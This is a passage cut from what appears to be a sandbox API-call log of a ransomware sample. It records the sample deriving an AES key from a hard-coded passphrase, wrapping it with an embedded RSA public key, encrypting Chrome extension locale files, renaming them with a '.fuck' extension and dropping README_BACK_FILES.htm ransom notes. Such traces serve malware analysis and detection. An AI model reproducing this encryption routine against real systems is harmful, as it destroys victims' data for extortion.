pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.360] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.360] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e70408) returned 1 [0260.361] CryptImportPublicKeyInfo (in: hCryptProv=0x2e70408, dwCertEncodingType=0x1, pInfo=0x2eb1ba0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1bd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1bd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d6c0) returned 1 [0260.361] CryptEncrypt (in: hKey=0x2e7d6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.361] CryptEncrypt (in: hKey=0x2e7d6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6f8e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6f8e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.361] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6f8e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6f8e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.362] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xe6, lpOverlapped=0x0) returned 1 [0260.363] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe6, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0260.363] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0260.363] CloseHandle (hObject=0x5d5c) returned 1 [0260.363] CloseHandle (hObject=0x5d64) returned 1 [0260.363] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), bFailIfExists=0) returned 1 [0260.366] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json", dwFileAttributes=0x0) returned 1 [0260.367] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.gsg")) returned 1 [0260.368] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.fuck")) returned 1 [0260.368] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.368] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.369] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.369] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.369] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.369] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\readme_back_files.htm")) returned 0xffffffff [0260.369] AreFileApisANSI () returned 1 [0260.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.369] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.370] GetFileType (hFile=0x5d60) returned 0x1 [0260.370] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.371] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.371] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.371] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.371] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.371] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.371] GetLastError () returned 0x0 [0260.371] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json")) returned 0x20 [0260.372] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json", dwFileAttributes=0x80) returned 1 [0260.373] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.373] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.377] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.377] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.380] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.380] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.380] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.380] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.380] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.380] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.380] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e702f8) returned 1 [0260.381] CryptImportPublicKeyInfo (in: hCryptProv=0x2e702f8, dwCertEncodingType=0x1, pInfo=0x2eb2560*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2590*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2598*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d500) returned 1 [0260.381] CryptEncrypt (in: hKey=0x2e7d500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.381] CryptEncrypt (in: hKey=0x2e7d500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6fc10*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6fc10*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.381] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6fc10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6fc10*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.385] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xe2, lpOverlapped=0x0) returned 1 [0260.386] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0260.386] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0260.386] CloseHandle (hObject=0x5d64) returned 1 [0260.386] CloseHandle (hObject=0x5d5c) returned 1 [0260.387] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), bFailIfExists=0) returned 1 [0260.391] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json", dwFileAttributes=0x0) returned 1 [0260.392] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.gsg")) returned 1 [0260.393] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.fuck")) returned 1 [0260.396] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.396] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.396] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.396] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.396] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.396] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\readme_back_files.htm")) returned 0xffffffff [0260.396] AreFileApisANSI () returned 1 [0260.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.396] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.397] GetFileType (hFile=0x5d60) returned 0x1 [0260.398] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.400] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.400] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.401] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.401] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.401] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.401] GetLastError () returned 0x0 [0260.401] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json")) returned 0x20 [0260.401] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json", dwFileAttributes=0x80) returned 1 [0260.401] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.402] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.404] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.405] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.407] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.407] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.407] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.407] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.407] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.407] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.407] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6fa78) returned 1 [0260.407] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6fa78, dwCertEncodingType=0x1, pInfo=0x2eb1e10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1e40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1e48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d480) returned 1 [0260.408] CryptEncrypt (in: hKey=0x2e7d480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.408] CryptEncrypt (in: hKey=0x2e7d480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6fda8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6fda8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.408] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6fda8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6fda8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.409] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xf2, lpOverlapped=0x0) returned 1 [0260.410] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0260.410] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0260.410] CloseHandle (hObject=0x5d5c) returned 1 [0260.410] CloseHandle (hObject=0x5d64) returned 1 [0260.410] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), bFailIfExists=0) returned 1 [0260.414] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json", dwFileAttributes=0x0) returned 1 [0260.414] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 